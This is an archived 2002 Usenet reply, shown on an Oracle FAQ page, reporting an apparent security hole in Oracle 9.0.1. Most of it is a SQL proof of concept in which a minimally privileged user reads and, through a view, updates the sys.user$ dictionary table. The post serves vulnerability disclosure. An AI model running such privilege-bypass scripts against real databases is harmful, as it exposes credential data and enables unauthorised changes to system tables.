Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Usenet -> c.d.o.server -> Re: Oracle 9i DB Security Hole

Re: Oracle 9i DB Security Hole

From: m. fowler <mfowler_at_dot.co.pima.az.us>
Date: 17 Apr 2002 14:25:34 -0700
Message-ID: <e9c5a67.0204171325.75893853@posting.google.com> 





try this:



create user test identified by test;


grant create session to test;


grant create view to test;


connect test/test;


select *


from sys.user$ left outer join user_users
on sys.user$.name = user_users.username;
create view oh_no as


select sys.user$.name nam


from sys.user$ left outer join sys.ts$


on sys.user$.name = sys.ts$.name;


update oh_no set nam = nam;


rollback;
 


Anyone relying on v 9.0.1 should know about this, it would seem.  



> >Could you please provide at least *some* proof? Obviously you can't.

> >

Received on Wed Apr 17 2002 - 16:25:34 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US